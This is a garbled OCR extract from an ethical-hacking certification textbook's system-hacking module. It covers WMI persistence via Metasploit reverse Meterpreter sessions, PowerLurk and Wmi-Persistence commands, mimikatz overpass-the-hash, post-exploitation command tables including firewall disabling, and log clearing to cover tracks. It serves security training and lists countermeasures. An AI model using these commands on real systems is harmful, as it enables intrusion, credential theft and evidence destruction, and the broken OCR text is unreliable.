Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Figure 6.198: Screenshot of Command Prompt executing wmic commands The malicious payload is automatically executed within 60 s after every restart of the system and creates a Meterpreter session with the attacker.
ploits - 1149 auxiliary - 398 post ayloads - 45 encoders - 10 nops asion
loit tip: Use the command to open the currently active module in your editor Imst6 > 6 > use exploit/multi/handler Using
configured
payload
generic/shell_reverse_
tcp
oadp windows/meterpreter/reverse tcp ) > set payl Imsf6 exploit( payload => windows/meterpreter/reverse_tc 0.10.1.13 > set 6 exploit ( host => 10.10.1.13 > set lport 444 Imsf6 exploit( port exploit (
) > run
arted reverse TCP handler on 10.10.1 nding stage (175174 bytes) to 10.10.1.19 Meterpreter sion 1 opened (10.10.1.13:444 Server
-> 10.10.1.19:49789)
at 2022-04-07 08
getuid
username:
SERVER2019\Administrato
Figure 6.199: Screenshot showing the Metasploit Meterpreter session Using Wmi-Persistence
Attackers also use Wmi-Persistence, a PowerShell script, to perform WMI event subscriptions and acquire persistence. It triggers various actions such as Startup, Logon, Interval, and Timed and allows attackers execute various functions such as the installation, review, and removal of the WMI events. Execute the following command to run a malicious payload on the compromised system to maintain persistence: Install-Persistence -Trigger Startup -Payload "c: \windows\system32\ethicalhacker.exe"
Module 06 Page 890
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Terminal
port => 444 Insf6 exploit(
Help ) > set lport 444
‘console - Parrot
Termin:
) > run
Started reverse TCP hand 19.10.1.13:444 Sending stage (175174 bytes) to 10.10.1.19 Meterpreter session 1 opened (10.10.1.13:444 -> 10.10.1.19:49789) at 2022-04-67 08:53:15
-0406
terpreter
> getuid |ERVER2019\ Administrator rpreter > upload /home/attacker/wmi -Persistence-mas ers\\Administr uploading : /home/attacker/Wmi-Persistence-master/README.md Users\ Administ rator\Downloads README .md uploaded home/attacker/Wmi -Persistence DME.md -> C:\Users\Administrator\Downloads README . md uploading Wi -Persistence-master/WMI istence.ps1 -> C:\Users\Administrator Downloads\WMI -Pers uploaded home/at tacker /Wmi-Persistence-master/WMI-Persistence.ps1 -> C:\Users\Administrator Downloads \WMI-Pers. e.psl load powershell meter: Loading extension powershell. . .Success Incterpreter > powershell shell IPs > Import-Module_. /WHI-Persistence.ps1. PS > Install-Persistence -Trigger Startup -Payload "C:\Users\Administrator Downloads \wi exe Event Filter Dcom Launcher successfully written to host Event Consumer Dcom Launcher successfully written to h Filter To Consumer Binding successfully written to
Terminate channel 3? {y/N) Ml
Figure 6.200: Screenshot of PowerShell showing Wmi-Persistence
The above command includes a trigger Startup that executes the specified payload within 5 min after system reboot and establishes a Meterpreter secession with the attacker.
2* Info:
*superusers*H@rdT@
ipse*Gingabeast cl *E lo al ci es kr ac mH F* CT 3b3r*operators*NULL*stux *Hamad*Immortalsfar
asan*MouseTrap* P* *P@Ge2me* Cs et st en we lu Ho *b t* rs oo t3 2r un ll _H nu @g a* Fl aa r* ad de *t Va oi rd *damn_sadb fezfezf*Lo
2169 exploits - 1149 auxiliary - 398 post 592 payloads - 45 encoders - 10 nops Metasploit tip: Use the ‘omnands from a file
command to run
insf6 > use exploit/milti/handler Using configured payload generic/shell_re tcp Insf6 exploi ) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse tcp insf6 exploit( ) > set lhost 10.10.1.13 host => 10.10.1.13 Insf6 exploit( set lport 444 port => 444 jas f6 exploit( > exploit Started reverse TCP handler on 10.10.1.13:444 Sending stage (175174 bytes) to 10.10.1.19 Meterpreter session 1 opened (10.10.1.13:444 -> 19.10.1.19:49709)
at 2022-04-07 09:30:26
-0400
rpreter
Figure 6.201: Screenshot of the Metasploit Meterpreter session Module 06 Page 891
al Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
Using PowerLurk
Source: https://github.com PowerLurk is a PowerShell toolset for building malicious WMI event subscriptions. The goal of PowerLurk is to make WMI events easier to trigger during a penetration test or red-team engagement. Attackers use PowerLurk to create malicious WMI event subscriptions and execute arbitrary payloads on every Windows logon. This script can trigger the events such as InsertUSB, UserLogon, Timed, Interval, and ProcessStart. Run the following command to import the PowerLurk script to a local instance: Import-Module
.\PowerLurk.ps1
Run the following command to identify all the active WMI event objects: Get-WmiEvent
Run the following command to create a malicious event subscription that executes the malicious payload and creates a Meterpreter session: Register-MaliciousWmiEvent -EventName Logonlog -PermanentCommand "ethicalhacker.exe" -Trigger UserLogon -Username any
Figure 6.202: Screenshot of PowerShell showing Get-WmiEvent
Module 06 Page 892
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Overpass-the-Hash Attack
CE H
|@ The overpass-the-hash (OPtH) attack is an extension of pass-the-ticket and pass-the-hash attacks @ Itisa type of credential theft-and-reuse attack using which attackers perform malicious activities on compromised devices or environments
@ The main goal of an OPtH attack is to acquire Kerberos tickets using the NTLM hash of different user accounts mimikatz
© Attackers also use mimikatz to perform OPtH attacks and obtain AES128, NTLM (RC4), and AES256 keys for a Kerberos ticket, which can be further used to access different authorized resources
eS Copyright © by
Al Rights Reserved Reproduction i
Overpass-the-Hash Attack The overpass-the-hash (OPtH) attack is an extension of pass-the-ticket and pass-the-hash attacks. It is a type of credential theft-and-reuse attack using which attackers perform malicious activities on compromised devices or environments. The main goal of an OPtH attack is to acquire Kerberos tickets by using the NTLM hash of different user accounts. Attackers initially exploit the security limitation within the NTLM protocol to obtain password hashes or AES from the LSASS memory on the domain controller (DC) or a compromised system. The password hashes are reused by the attackers (until the user changes the password) for gaining access to other network resources. As this is a post-exploitation process, the attackers must have already obtained valid NTLM hashes or AES keys of the target user to request a Kerberos TGT for that specific account. Eventually, attackers gain access to different devices or services that are permissible through the account, and they can manipulate them accordingly.
Module 06 Page 893
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Attackers use tools such as mimikatz to perform OPtH attacks.
=
mimikatz
Source: https://github.com The mimikatz tool credentials such as performing privilege Given below are the (RC4), and AES256 different authorized privilege: sekurlsa:
allows attackers to obtain and store different authentication Kerberos tickets. It assists attackers in stealing credentials and escalation. Attackers also use mimikatz to perform OPtH attacks. commands used to perform the attack and obtain AES128, NTLM keys for a Kerberos ticket, which can be further used to access resources.
:debug :ekeys
Figure 6.203: Screenshot of mimikatz
Module 06 Page 894
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
CEH
Linux Post-Exploitation File-System Commands
Information-Gathering Commands
Command
Des«
Displays the current process along with its process ID (PID) Attaches a file system to the directory tree structure
Displays host/networknames in numericform
Discovers .txt files on the system
Is 2> /dev/null
a
Displays the list of permitted and forbidden commands
cat /etc/crontab
Displays running cron jobs
Linux Post-Exploitation After compromising and gaining shell access to a target system, attackers attempt to perform further exploitation to gain complete access over other resources and achieve long-term persistence. Listed below are some Linux-based post-exploitation commands.
File-System Commands Command find
/
-perm
-3000
find
/
-path
/sys
/proc
1s
2>
/proc
1s
-o
/dev/null
chmod
find
-prune
o-w
/
2>
-prune
sudo
-1
2>
/dev/null
-prune
-type
-o
-path
f -perm
-o=w
Discovers SUID-executable binaries
-
-name
Discovers world-writable files Disables write access to a file
/sys
-o
/dev/null /
-ls
file
-path
find
Description
-prune
-type
"*.txt"
-o
-path
d -perm
-ls
2>
-o=w
-
/dev/null
Discovers world-writable directories Discovers .txt files on the system Displays the list of permitted and
forbidden commands
openssl s_client -connect : -showcerts
Displays all certificates’ details
keytool -list keystore.jks
Displays contents of keystore files and alias names
-v
-keystore
Table 6.13: Commands on file systems
Module 06 Page 895
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures ‘System Hacking
Exam 312-50 Certified Ethical Hacker
Information-Gathering Commands Command ps
Description
-ef
Displays the current process along with its process ID (PID)
mount
Attaches a file system to the directory tree structure
route
-n
/sbin/ifconfig cat 1s
Displays host/network names in numeric form
-a
/etc/crontab -la
cat
/etc/cron.d
/etc/exports
Displays network configuration details Displays running cron jobs
Displays the software package used for the specified cron job Displays directories that can be exported to NFS clients
cat /etc/redhat* /etc/debian* /etc/*release
Displays the OS version details
1s
Lists bootup services
/etc/re*
egrep
-e
'/bin/ (ba) ?sh' /etc/passwd
Displays all the users who have shell access
cat
Displays SSH relationships and login details
~/.ssh/
Table 6.14: Commands for gathering information
Module 06 Page 896
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking
Windows Post-Exploitation
|
File-System Commands
WMIC Commands
Sees nr seaeyaerwmuse
Reboots Windows
findstr/E".Jog">log-xt
(eur
Retrieves the processor's details
CEU LAR eet asa
Retrieves all the document files
na
aid
Retrieves login names and their SIDs
Service Commands commend
Remote Execution Commands
[bescistion
Sequeryex typenservice tec ‘sc queryex type=service
|
Listsall the available services
a
[CEES show sate netsh firewall netsh firewall show config netsh advfirewall set currentprofile state off SSS eaRaR
commend
wii [nodes /Juseradministrator /password:SPASSWORD bios get serialnumber
7
taskkiLexe /S 70
/stops a network service Starts aaa
Displays firewall settings ‘Turns off the firewall service for the current profile Tons of the frewall service forall profiles
omaln\uername [F/I "esat* sername taskstexe
/U
capa aieee % so /S iP eciese> /U lied ee NOME AUTHORITY\SYSTEM run
|
bescription
rieves the PC's serial |Snhaanunaleeali
|
cos
Terminates services associated
wath eswats wise nes the ser con
lomcute commends Retrieves all the processes cunning on these system a that are not actually “SYSTEM’
Windows Post-Exploitation Once attackers compromise a system and gain shell access to it, they can perform various undesirable activities without the user’s knowledge. The main intention behind performing post-exploitation is to gain control over every part of the system and maintain persistence over time. Listed below are some Windows-based post-exploitation commands.
File-System Commands Command dir
Description
/a:h
Retrieves the directory names with hidden attributes
findstr
/E
".txt"
>
txt.txt | Retrieves all the text files
findstr
/E
".log"
>
log.txt | Retrieves all the log files
findstr
/E
".doc"
> doc.txt | Retrieves all the document files Table 6.15: File-system commands
Hash Computing Commands
Command
Description
Get-FileHash
-a
md5
Get-FileHash
-a
shal
Get-FileHash
Generates MD5 hashes | Generates SHA-1 hashes Retrieves SHA-256 hashes by default
Table 6.16: Hash computing commands
Module 06 Page 897
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Registry Commands Command reg query HKLM /f credential /t REG SZ
hk1m_password.
txt
Description /s
>
Detects the registry hives for the value “credential”
reg query
HKLM\SOFTWARE\Policies\Micr
osoft\Windows\Installer
AlwaysInstallElevated reg_always.txt
reg query
HKEY
LOCAL
>
/v
MACHINE\Software
\Microsoft\Windows\Currentv | ersion\Uninstall >> ListofInstalledPrograms. txt
Installs a package with elevated privileges
Provides a list of all programs to query a registry
Table 6.17: Registry commands
Scheduler Commands Command schtasks
/query
tasklist
/Svc
>
/fo
schtasks. txt
tasklist.txt
Description LIST
/v
>
Retrieves the scheduled task list Retrieves all currently active processes
Table 6.18: Task schedule commands
WMIC Commands Command wmic os Primary='TRUE'
Description
reboot
where
wmic service get name ,displayname,pathname,s tartmode > wmic_service.txt wmic
/node:""
:
product
name ,version, vendor
wmic
cpu
get
wmic useraccount : name,sid
get
Reboots Windows Retrieves the service name, path of the executable,
etc.
Displays the details of the installed software Retrieves the processor’s details
get
Retrieves login names and their SIDs Table 6.19: WMIC commands
Module 06 Page 898
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Net Commands Command net
config
rdr
net computer /add net
view
net
view
net
share
Description Shows domain connection details
\\computername
Adds a computer to the domain Displays the list of computers and networks devices in
the domain \\host
Displays the name of the host computer Helps manage shared resources with the appropriate parameters
Table 6.20: Net commands
Network Commands Command route
print
or
Description
netstat
-r
Displays routing tables for the destination
command
arp
-a
Shows the ARP table for a specific IP address
ipconfig
/all
Displays IP configuration details
getmac
Retrieves the physical address Table 6.21: Network commands
Service Commands Command
Description
sc
queryex
type=service
sc
queryex
type=service
state=all
state=all | find /i "Name the service: myService" net
start
or
Lists all the available services
of
Lists details about the specified service
Starts/stops a network service
stop
netsh
firewall
show
state
Displays the current firewall state
netsh
firewall
show
config
Displays firewall settings
netsh advfirewall set currentprofile state off
Turns off the firewall service for the current profile
netsh advfirewall allprofiles state
Turns off the firewall service for all profiles
set off
Table 6.22: Service commands
Module 06 Page 899
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures ‘System Hacking
Exam 312-50 Certified Ethical Hacker
Remote Execution Commands
Command
Description
wmic /node: /user:administrator /password:$PASSWORD bios serialnumber
Retrieves the PC’s serial number
get
taskkill.exe /S domain\username
/F /FI "eset"
/U
tasklist.exe /S domain\username
tasklist.exe /S /U domain\username /FI "USERNAME eq NT AUTHORITY\SYSTEM" /FI "STATUS eq running"
Terminates services associated with eset Defines the user context to execute commands
Retrieves all the processes running on the system that are not actually “SYSTEM”
Table 6.23: Remote execution commands
Sysinternals Commands Command psexec cmd
Description
-i
\\
psexec -i file.exe
\\
Establishes an interactive CMD with a remote system -c
psexec -i -d -s c:\windows\regedit.exe psexec
ipconfig
-i
Copies
file.txt
computer
from
the
local
machine
to
a
remote
Retrieves the contents of security keys and SAM
\\
Displays a remote system’s network information
/all
Table 6.24: Sysinternals commands
Authenticated WMI Exec via PowerShell Commands
Description
msf > use exploit/windows/local/ps_wmi_exec
Launches a suitable local exploit
msf exploit (windows/local/ps_wmi_exec) show targets
>
msf exploit (windows/local/ps_wmi_exec) show options
>
msf exploit (windows/local/ps_wmi_exec) show payloads
>
msf exploit (windows/local/ps_wmi_exec) show evasion
>
Displays the list of targets Displays all the available options Displays possible payloads Displays suitable evasion options.
Table 6.25: Metasploit commands
Module 06 Page 900
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
How to Defend against Persistence Attacks Discussed attacks:
below
are some
of the
countermeasures
to defend
against
domain
dominance
Frequently change the password of KRBTGT. Use admin credentials only if the data need to be shared among the devices. Give access permissions based on user roles. Perform system patch management periodically. Deploy a minimum privileges access model, which assists in restricting user access and domain admin account access. Monitor Kerberos TGTs and domain replication activities. Regularly change KRBTGT’s password and reset the service twice. Validate the Kerberos protocol externally to ensure that TGTs are not forged. Conduct security awareness campaigns/training on phishing attacks, password creation policies, and other methods. Strictly adhere to password policies (in terms of password length, periodic updates, etc.) to enhance the security of individual account access. Ensure that Kerberos follows the signing of the Privilege Attribute Certificate (PAC) and TGS with the key “krbtgt” by the key distribution center (KDC). Deploy the Kerberos validation provided by a valid KDC.
tool for verifying the legitimacy of individual tickets
Install KB2871997 patch in systems running on Windows 7 and higher for restricting the default account access within the local administrator group. Restrict the credential overlap privileged account management.
within
systems
to
limit
lateral
movement
through
Impose the UAC limitations across local accounts over network logon by enabling passthe-hash mitigations. The registry key to apply UAC restrictions is HKLM\ SOFTWARE \Microsoft\Windows\CurrentVersion\Policies\System\Lo calAccountTokenFilterPolicy
Restrict domain users within a local administrator group across multiple systems. Limit the inbound traffic through Windows Firewall.
Module 06 Page 901
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
CEH
LO#04: Demonstrate Techniques to Hide the Evidence of Compromise
Clearing Logs In the previous section, we saw how an attacker can hide malicious files on a target computer using various steganographic techniques, NTFS streams, and other techniques to maintain future access to the target. Once the attacker has succeeded in performing this malicious operation, the next step involves removing any resultant traces/tracks in the system.
Module 06 Page 902
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Covering Tracks ‘@
Once intruders have successfully
gained administrator access ona
system, they will try to cover their
tracks to avoid detection
C iE H
=
|_|
& JB Nap even eeeeeeeeeeeeeen: >
Gained
Administrator
Target User
‘Access
Cover Tracks
The attacker uses the following techniques to cover his/her tracks on the target system
e
Disable Auditing
© cosine ce (3)
Manipulating Logs
e
Covering Tracks on the Network/OS
| | © oxeeaseae stes (6)
Disabling Windows Functionality Copyright © by
Covering Tracks Covering tracks is one of the main stages during system hacking. In this stage, the attacker tries to hide and avoid being detected or “traced out” by covering all “tracks,” or logs, generated while accessing the target network or computer. We now look at how the attacker removes traces of an attack on a target computer. Erasing evidence is a must for any attacker who would like to remain obscure. used to evade a traceback. It starts with erasing the contaminated logs and messages generated in the attack process. The attacker makes changes configuration such that it does not log the future activities. By manipulating and logs, the attacker tricks the system administrator into believing that there activity in the system and that no intrusion or compromise has taken place.
It is a method possible error to the system tweaking event is no malicious
Because the first thing a system administrator does when monitoring unusual activity is check the system log files, it is common for intruders to use a tool to modify these logs. In some cases, rootkits can disable and discard all existing logs. Attackers remove only those portions of logs that can reveal their presence if they intend to use the system for a long period as a launch base for future exploitations. Attackers must make the system appear as it did before access was gained and a backdoor was established. This allows them to change any file attributes back to their original state. The information listed, such as file size and date, is just attribute information contained in the file. Protection against attackers trying to cover their tracks by changing file information can be difficult. However, it is possible to detect whether an attacker has done so by calculating the file’s cryptographic hash. This type of hash is a calculation of the entire file before encryption.
Module 06 Page 903
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Attackers may not wish to delete an entire log to cover their tracks, as doing so may require admin privileges. If attackers can delete only attack event logs, they will still be able to escape detection. The attacker can manipulate the log files with the help of =
SECEVENT.EVT (security): failed logins, accessing files without privileges
=
SYSEVENT.EVT (system): driver failure, things not operating correctly
=
APPEVENT.EVT (applications)
Techniques Used for Covering Tracks The main activities that an attacker performs toward removing his/her traces on a computer are as follows: =
Disabling Auditing: An attacker disables auditing features of the target system.
=
Clearing Logs: An his/her activities.
=
Manipulating Logs: An attacker manipulates logs in such a way that he/she will not be caught in legal action.
=
Covering Tracks on the Network: An attacker uses techniques such as reverse HTTP shells, reverse ICMP tunnels, DNS tunneling, and TCP parameters to cover tracks on the network.
=
Covering Tracks on the OS: An attacker uses NTFS streams to hide and cover malicious files in the target system.
=
Deleting Files: An attacker uses a command-line tool such as Cipher.exe to delete the data and prevent recovery of that data in future.
=
Disabling Windows Functionality: An attacker disables Windows functionality such as last access timestamp, hibernation, virtual memory, system restore points, etc. to cover tracks.
=
Hiding Artifacts: Attackers hide their malicious artifacts within the OS artifacts to evade detection.
attacker
clears/deletes
the
system
log entries
corresponding
to
Thus, the complete job of an attacker involves not only compromising the system successfully, but also disabling logging, clearing log files, eliminating evidence, planting additional tools, and covering his/her tracks.
Module 06 Page 904
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Disabling Auditing: Auditpol
[=o] a
@
Intruders disable auditing
immediatly after gaining administrator privileges
@
Toward the end of their stay, the
intruders simply turn on auditing again using auditpol.exe
‘tes /8ocs microsoft.com
Disabling Auditing: Auditpol Source: https://docs.microsoft.com One of the first steps for an attacker who has command-line capability is to determine the auditing status of the target system, locate sensitive files (such as password files), and implant automatic information-gathering tools (such as a keystroke logger or network sniffer). Windows records certain events to the event log (or associated syslog). The log can be set to send alerts (email, SMS, etc.) to the system administrator. Therefore, the attacker will want to know the auditing status of the system he/she is trying to compromise before proceeding with his/her plans. Auditpol.exe is the command-line utility tool to change audit security settings at the category and sub-category levels. Attackers can use AuditPol to enable or disable security auditing on local or remote systems, and to adjust the audit criteria for different categories of security
events.
The moment intruders gain administrative privileges; they disable auditing with the help of auditpol.exe. Once they complete their mission, they again turn on auditing using the same tool. After gaining access and establishing shell access with the target system, following commands to enable/disable system auditing logs:
attackers use the
Enabling system auditing: C:\>auditpol
/set
/failure:enable
Module 06 Page 905
/category:”system”,”account
logon”
/success:enable
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Disabling system auditing: C:\>auditpol
/set
/failure:disable
/category:”system”,”account
logon”
/success:disable
This will make changes in the various logs that might register the attacker’s actions. He/she can choose to hide the registry keys changed later on. Attackers can use AuditPol to view defined auditing settings on the target computer, the following command at the command prompt: auditpol
/get
running
/category:*
Screenshots of the output by Auditpol are as follows: BH Administrator: Command Prompt
unt
ao
x
logon”
|
Figure 6.204: Screenshot showing the output of Auditpol disabling audit BIH Administrator: Command Prompt 2>auditpol
t
r
o
x e
|
full
Figure 6.205: Screenshot showing the output of Auditpol enabling audit Module 06 Page 906
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Clearing Logs
CEH
@ The attacker uses the clear lear ththe security, ity, system, system, and and application application | logs
utility to
W Ifthe system is exploited with Metasploit,the attacker uses to wipe out all the logs froma Windows system
Tilas Jnr fenforumacom
Clearing Logs (Cont’d) The attacker uses the commandto clear all the PowerShell event logs from local or remote computers
CEH The attacker uses the utility to clear event logs relatedto the system, application, and security
© Toclear the entries from the PowerShell event from a local or remote system: © To clear specific multiple log types from the local and remote systems:
© Toclear all logs on the specified systems and then display the event log list:
Clearing Logs Clear_Event_Viewer_Logs.bat is a utility that can be used to wipe out the logs of the target system. This utility can be run through command prompt, PowerShell, and using a BAT file to delete security, system, and application logs. Attackers might use this utility to wipe out the logs as one method of covering their tracks on the target system.
Module 06 Page 907
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking =
Exam 312-50 Certified Ethical Hacker
Steps to clear logs using Clear_Event_Viewer_Logs.bat utility are as follows.
Pw nN
Download the Clear_Event_Viewer_Logs.bat utility from https://www.tenforums.com. Unblock the .bat file.
no
1.
A command prompt will now open to clear the event logs. The command will automatically close when finished.
BB CAWindows\
Right-click or press and hold on the .bat file and click/tap on Run as administrator. If prompted by UAC, click/tap on Yes.
System32\cmd.exe
prompt
o
x
Figure 6.206: Screenshot of clearing logs using the Clear_Event_Viewer_Logs.bat file =
Steps to clear logs using Meterpreter shell are as follows. If the system is exploited with Metasploit, the attacker uses a Meterpreter shell to wipe out all the logs from a Windows system: 1.
Launch the meterpretershell prompt from the Metasploit Framework.
2.
Type clearev command in the Meterpreter shell prompt and press Enter. The logs of the target system will start being wiped out.
Module 06 Page 908
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
NT AUTHORITY\SYSTEM > run post/windows/gather/smart_hashdump SION may not be compatible with this module et_term size sys_proces ing Meterpreter features Running module against WINDOWS11 ill be saved to the database if one is connected oot in JtR p rd file format to 040218 default_10.10.1.11 windows hashes
Dumping ¢ Running as S ting hashes from registry Obtaining the boot key
EY bf7ee388b30e6e9f6b86de4c
culating the hboot key using ing the user list and k
user
word
295636.
txt
18416716
keys
hint
ord hints
on this
system
5.1404eeaad3b435b51404ee : 31d6cfedd16ae931b 51404ee : 31d6cfedd16ae931b73c59d7e0ce 1404eeaad az DefaultAccount : 503: WDAGUti LityAccount :504:aad3 51484eeaad3b435b51404ee: 31d6cfedd16ae931b73c59d Admin: 1002: aad3b435b51404 5b5140dee: 31d6cfe0d16ae931b73c59d7e0c089c0 Jason: 1005 : aad3b435b51404eeaad3b435b51404ee : 31d6cfedd16ae931b7: e0cO89c0 Shiela: 1006: aad3b435b51404eeaad3b435b51404ee : 31d6cfedd16ae931! 9d7e0c08 10 7: aad3b435b51404eeaad3b435b51404ee : 31d6cfeOd16a 9d7e6c from Application from Syste
Figure 6.207: Screenshot of Meterpreter
Steps to clear PowerShell logs using Clear-EventLog command are as follows.
Source: https://docs.microsoft.com Using the Clear-EventLog command, the attacker can clear all the PowerShell event logs from local or remote computers: 1.
Launch Windows PowerShell with administrator privileges.
2.
Use the following command the local or remote system: >Clear-EventLog
to clear the entries from the PowerShell event log on
"Windows
PowerShell"
Use the following command to clear specific multiple log types from local or remote
systems:
>Clear-EventLog localhost,
-LogName
ODiag,
OSession
-ComputerName
Server02
(This command clears all the log entries in Microsoft Office Diagnostics (ODiag) and Microsoft Office Sessions (OSession) on the local computer and Server02 remote computer.) Use the following command to clear all the logs on the specified systems, and then display the event log list: >Clear-EventLog Module 06 Page 909
-LogName
application,
system
-confirm
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
Note: The parameters used in the Clear-EventLog
=
command are as follows:
©
-ComputerName: Specifies
a remote computer; the default is the local computer
©
-Confirm: Prompts you for confirmation before running cmdlet
©
-LogName: Specifies the event logs
©
-WhatIf: Shows what will happen if the cmdlet runs
Steps to clear event logs using wevtutil utility are as follows. 1.
Launch command
2.
Use the following command to display a list of event logs: >wevtutil
3.
prompt with administrator privileges.
el
Use the following command to clear the event logs: >wevtutil
cl
log_name: name of the log to clear, ex: system, application, security. As shown in the screenshot, the attacker can view the list of event logs using the wevtutil utility and clear the system, application, and security event logs.
°° 0 555
Select Administrator: Command Prompt
>rmance
m>
pmance
DevicePro MediaEngi Performance
Figure 6.208: Screenshot of clearing logs using the wevtutil utility Module 06 Page 910
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures System Hacking
Exam 312-50 Certified Ethical Hacker
CEH
Manually Clearing Event Logs For Windows
For Linux
© Navigateto Start > Control Panel > System and Security > Windows Tools > double click Event Viewer © Delete the all the log entries logged while compromisingthe system
Diiomaon sean 2ts9R nd eae 1Bhppa Scone
Gymmariatont
Geomsnstaont sim iat
Sent
||
Seance feneso ents
© Navigateto /var/log directoryon the Linux system © Open the plain text file containing log messages with text editor /vax/1og//
© Delete all the log entries logged while compromisingthe system
Ops. "
Manually Clearing Event Logs Once attackers gain administrative access to a target system, they can manually wipe out the log entries corresponding to their activities on both Windows and Linux computers. The steps to clear event logs on Windows and Linux OSs are as follows:
Module 06 Page 911
Ethical Hacking and Countermeasures Copyright © by EC-Coul All Rights Reserved. Reproduction is Strictly Prohibi
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
System Hacking
For Windows
=
Navigate to Start > Control double-click Event Viewer
Panel
>
System
and Security >
=
Delete the all the log entries logged while compromising the system
Windows
@ Event Viewer
File
Action
=
View
|G
Application
x
Nu
@nformation @nformation
G] Forwarded Events
Date and Time
Gifomainn sree Information information
21: 4/5/2022 11:21:50PM
4/5/2022 11:21:50 PM
Q@information @information
4/5/2022 11:21:50 PM 4/5/2022 11:21:50 PM
@information
@information
PD tat neon
4/5/2022 11:21:50 PM
|Application &_ Open Saved Log... W Create Custom Vie...
it
4/5/2022 11:21:50 PM 4/5/2022 11:21:50 PM
ionsLo)] (information .& Applicat and Services
[Subscriptions
o
>
Help
Level
>
Tools
=
Y
it
©
Filter Current Log...
Properties
ry Find inde
As... fel Save All Events
4/5/2022 11:21:50 PM
ee
Argon) 14.91.80 0A
x
Event 1033, Security-SPP General jeneral DetailsDetail
[These policies are being excluded since they are only definedw | Policy Names= (Security-SPP-Reserved-EnableNotificationMod |Avo Id=55c92734-d682-4d71-983e-d6ec3#16059F
View [GQ Refresh Help
» ,
| Event 1033, Security-SPP a — (2) Event Properties D
Attach Task To This...
By Copy
>
Figure 6.209: Clearing event logs for Windows
Module 06 Page 912
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
‘System Hacking For Linux
Navigate to the /var/log directory on the Linux system Open the plaintext /var/log/
file
containing
log
messages
with
text
editor
Delete all the log entries logged while compromising the system boot.tog
332m
5 [fe]l@;32m
6
7 (fJlo:32m
OK
ok
[{3][Om]
Reached
‘orward
target
save
Password
[J[0;1;39mLocal
Encrypt
[3][m] Found device fi]{@;1;39mVirtual Disk 1]
Starting
[][@;1;39mFile
System Check
on /dev/disk/t
ok [Elon] started fz]lo;1;39mFile system check og
8 [f]l0;32m OK [i3)[om] Finished [3][@;1;39mFile System Check ¢ 9 Mounting [fj][0;1;39m/boot/efifgtom...
10 [[E]le;32m 11 [[]{@;32m
ok OK
lirectory watchfi][om.
Rec
cy oo
Om...
“°F
usfijtom.
Paste Delete
[lem] Mounted fi][o;1;39m/boot/efifs|[om. [3/[om] Reached target [fJ[0;1;39mLocal File S)
Select all insert Emoji
Starting f][@;1;39mEnable support for additional ei.
Changecase
wz
Starting [i][@;1;39mLoad AppArmor profilesfj][om...
4 1s
Starting Starting
